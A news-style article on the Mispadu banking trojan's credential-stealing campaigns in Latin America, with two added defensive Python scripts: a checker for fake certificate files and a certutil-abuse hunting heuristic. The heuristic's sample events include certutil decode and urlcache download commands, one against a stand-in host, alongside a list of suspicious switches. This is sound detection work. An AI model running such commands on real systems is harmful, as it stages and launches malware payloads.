The Mispadu banking trojan has stolen credentials in Latin America

March 30, 2023

Researchers have linked the Mispadu banking trojan to numerous spam campaigns targeting Latin American countries, including Mexico, Peru, and Chile. The campaigns' primary objectives are to steal credentials and to deliver further payloads to victims in those countries.

According to the cybersecurity group that discovered the activity, the ongoing operation has been running since August of last year.

Mispadu was first documented in November 2019. That reporting showed the trojan's operators combining credential theft with backdoor capabilities, including screenshot capture and keylogging.

The Mispadu banking trojan shares capabilities with other banking malware.

According to the investigation, Mispadu's capabilities overlap with those of other banking malware that targets the same region. The Delphi-based malware is delivered through email messages urging recipients to open what is presented as an overdue invoice; these lures start a multi-stage infection chain.

When the target opens the HTML attachment, it first checks that the file was opened on a desktop machine. If so, it redirects the victim to a remote server that serves the first-stage malware.

The downloaded RAR or ZIP archive carries a rogue digital certificate: a file formatted like a certificate whose Base64 body is actually the encoded payload. On launch, the malware abuses the legitimate Windows certutil command-line utility to decode that file and run the trojan.
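The trick works because certutil -decode only strips the BEGIN/END markers and Base64-decodes what lies between them; it never checks that the result is a certificate. A defender can make that check. The following is an added example, not code from the report or from the Mispadu authors: it pulls the Base64 body out of a PEM-style file, verifies whether the decoded bytes are a single DER SEQUENCE of the right length (which every real X.509 certificate is), and otherwise labels the body as an executable, archive, or unknown blob. Both sample files are constructed in the script; the "real-looking" one contains only the outer ASN.1 framing, enough for the structural check but not a usable certificate.

```python
import base64
import binascii
import re

# Constructed sample 1: a file that looks like a PEM certificate but whose
# Base64 body is a tiny MZ/PE header stub, i.e. an executable in disguise.
FAKE_CERT_BODY = b"MZ" + b"\x90" * 62 + b"PE\x00\x00" + b"\x00" * 16
FAKE_CERT_PEM = (
    "-----BEGIN CERTIFICATE-----\n"
    + base64.encodebytes(FAKE_CERT_BODY).decode()
    + "-----END CERTIFICATE-----\n"
)

# Constructed sample 2: only the outer ASN.1 framing of a DER certificate
# (SEQUENCE tag, long-form length), enough for the structural check below.
REAL_LOOKING_BODY = b"\x30\x82\x00\x04" + b"\x30\x82\x00\x00"
REAL_LOOKING_PEM = (
    "-----BEGIN CERTIFICATE-----\n"
    + base64.encodebytes(REAL_LOOKING_BODY).decode()
    + "-----END CERTIFICATE-----\n"
)

PEM_RE = re.compile(r"-----BEGIN ([A-Z ]+)-----(.*?)-----END \1-----", re.DOTALL)


def extract_pem_body(text: str) -> bytes:
    """Return the decoded Base64 body of the first PEM block in text.

    Raises ValueError if there is no PEM block or the body is not Base64.
    """
    m = PEM_RE.search(text)
    if m is None:
        raise ValueError("no PEM block found")
    compact = re.sub(r"\s+", "", m.group(2))
    try:
        return base64.b64decode(compact, validate=True)
    except binascii.Error as exc:
        raise ValueError(f"PEM body is not valid Base64: {exc}") from exc


def der_sequence_covers(data: bytes) -> bool:
    """True if data is exactly one DER SEQUENCE (tag 0x30) whose encoded
    length matches the data length, as every X.509 certificate must be."""
    if len(data) < 2 or data[0] != 0x30:
        return False
    first = data[1]
    if first < 0x80:                      # short-form length
        header, length = 2, first
    else:                                 # long-form length: 0x8N + N bytes
        n = first & 0x7F
        if n == 0 or len(data) < 2 + n:
            return False
        header = 2 + n
        length = int.from_bytes(data[2:2 + n], "big")
    return header + length == len(data)


def classify_payload(data: bytes) -> str:
    """Label what the decoded body actually is."""
    if der_sequence_covers(data):
        return "x509-der"
    if data[:2] == b"MZ":
        return "pe-executable"
    if data[:2] == b"PK":
        return "zip-archive"
    return "unknown"


def is_suspicious_certificate(text: str) -> bool:
    """A 'certificate' file whose body is not DER is a decoding vehicle."""
    try:
        body = extract_pem_body(text)
    except ValueError:
        return True  # claims to be a certificate but does not parse as one
    return classify_payload(body) != "x509-der"


if __name__ == "__main__":
    for name, pem in (("fake", FAKE_CERT_PEM), ("real-looking", REAL_LOOKING_PEM)):
        print(name, classify_payload(extract_pem_body(pem)),
              "suspicious" if is_suspicious_certificate(pem) else "ok")
```

Run it over every .crt, .cer or .pem dropped into user-writable directories; a "certificate" whose body decodes to MZ or PK is worth an alert on its own, before certutil ever touches it.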

Mispadu also enumerates the antivirus products installed on the infected host, harvests credentials from Microsoft Outlook and Google Chrome, and can fetch additional malware strains.

The additional payloads observed include an obfuscated Visual Basic Script dropper that downloads a further payload from a hard-coded domain, a .NET remote access tool, and a Rust-based loader.

For the banking theft itself, the trojan presents fake overlay screens on top of online banking portals to capture credentials and other sensitive details.

The certutil decoding trick has helped Mispadu's operators evade numerous security products. Researchers report that the operation has gathered more than 90,000 bank account credentials from over 17,000 unique websites.
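Because certutil is a signed Windows binary, file-based antivirus rarely objects to it; the more reliable signal is how it is invoked. The hunting heuristic below is an added example, not a rule from the report or from any vendor, and the process-creation events it runs over are constructed to resemble Sysmon Event ID 1 records (the paths, the "factura.crt" file name and the example.invalid URL are all made up). It flags certutil runs that use the decode, decodehex, urlcache or encode switches, and adds weight when the parent is a script host (the VBS dropper stage described above) or when the output path carries an executable extension.

```python
from __future__ import annotations

# Constructed process-creation events (Sysmon Event ID 1 style field names);
# none of these values come from the original report.
SAMPLE_EVENTS = [
    {  # the chain described in the article: script host -> certutil -decode -> .exe
        "Image": r"C:\Windows\System32\certutil.exe",
        "ParentImage": r"C:\Windows\System32\wscript.exe",
        "CommandLine": r"certutil.exe -decode C:\Users\Public\factura.crt C:\Users\Public\factura.exe",
    },
    {  # routine admin use, should not alert
        "Image": r"C:\Windows\System32\certutil.exe",
        "ParentImage": r"C:\Windows\System32\cmd.exe",
        "CommandLine": r"certutil -verify C:\temp\corp.cer",
    },
    {  # download via certutil with mixed case and slash-style switches
        "Image": r"C:\Windows\System32\certutil.exe",
        "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": r"CERTUTIL.EXE /urlcache /split /f http://example.invalid/x.crt x.crt",
    },
    {  # unrelated process, ignored by the image filter
        "Image": r"C:\Windows\System32\notepad.exe",
        "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": r"notepad.exe C:\Users\Public\factura.crt",
    },
]

SUSPICIOUS_VERBS = {"-decode", "-decodehex", "-urlcache", "-encode"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe", "powershell.exe"}
EXEC_EXTS = (".exe", ".dll", ".scr", ".com")


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def _normalize_switch(token: str) -> str:
    # certutil accepts both -decode and /decode; fold them together.
    return "-" + token[1:] if token.startswith("/") else token


def analyze_event(ev: dict) -> list[str]:
    """Return the reasons this event is suspicious (empty list if none)."""
    reasons: list[str] = []
    if _basename(ev["Image"]) != "certutil.exe":
        return reasons
    tokens = [_normalize_switch(t.lower()) for t in ev["CommandLine"].split()]
    verbs = [t for t in tokens if t in SUSPICIOUS_VERBS]
    if not verbs:
        return reasons
    reasons.append("certutil invoked with " + ",".join(verbs))
    parent = _basename(ev["ParentImage"])
    if parent in SCRIPT_HOSTS:
        reasons.append(f"spawned by script host {parent}")
    # tokens[0] is the image name itself, so skip it when looking at paths.
    if any(t.endswith(EXEC_EXTS) for t in tokens[1:]):
        reasons.append("output path has an executable extension")
    return reasons


def hunt(events: list[dict]) -> list[tuple[int, list[str]]]:
    """Index and reasons for every event that trips at least one heuristic."""
    return [(i, r) for i, ev in enumerate(events) if (r := analyze_event(ev))]


if __name__ == "__main__":
    for idx, reasons in hunt(SAMPLE_EVENTS):
        print(idx, SAMPLE_EVENTS[idx]["CommandLine"])
        for r in reasons:
            print("   -", r)
```

The verify-only invocation is deliberately left alone so that ordinary PKI administration does not page anyone; tune SCRIPT_HOSTS and EXEC_EXTS to the environment, and treat an event that collects all three reasons as high confidence.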
